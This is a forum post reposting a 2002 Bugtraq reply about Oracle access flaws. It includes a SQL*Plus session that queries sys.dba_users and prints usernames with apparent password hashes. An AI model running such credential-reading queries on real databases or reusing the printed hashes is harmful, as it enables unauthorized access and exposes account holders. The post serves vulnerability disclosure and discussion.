Forum OpenACS Q&A: Response to Bugtraq: ansi outer join syntax in Oracle 9i allows access to any data

Collapse
2: Response to Bugtraq: ansi outer join syntax in Oracle 9i allows access to any data (response to 1)
Posted by Jade Rubick on 04/17/02 01:51 AM 
Date: Tue, 16 Apr 2002 16:34:00 -0400
From: Charles J Wertz wertzcj@buffnet.net
To: Pete Finnigan pete@peterfinnigan.demon.co.uk, BUGTRAQ@securityfocus.com
Cc: wertzcj@buffnet.net
Subject: Re: ansi outer join syntax in Oracle allows access to any data

You don't need 9i or ansi syntax.

Connected to:
Oracle8i Enterprise Edition Release 8.1.6.0.0 - Production
With the Partitioning option
JServer Release 8.1.6.0.0 - Production

SQL> set serveroutput on size 1000000
SQL> sta users
SQL> select username, user_id, password from sys.dba_users
   2  /

......................
USERNAME                          USER_ID PASSWORD
------------------------------ ---------- ------------------------------
GABRMJ21                              206 A08F7F24DCD35845
ABDUSM62                              204 25F6BFBE9888CB23
CLARVL18                              205 E45523E8504F938E
SYMEJM94                              195 BF1A81C928566EEE
COSAL75                               118 4EDA8C950487B16F
CONNTS37                              117 B3EB3D464F64E317
ANASD51                               111 AC5DE6711420E91E
FEDEJB07                              224 5111DAC3006F6D81
DELLJM28                              223 FC707A68849F1C3F
CARTKR33                              222 2002A82D0DB2DB19
BRANLD12                              221 9857842415FF35B5
...

I haven't checked this out.
I take it these are encrypted passwords ??

cjw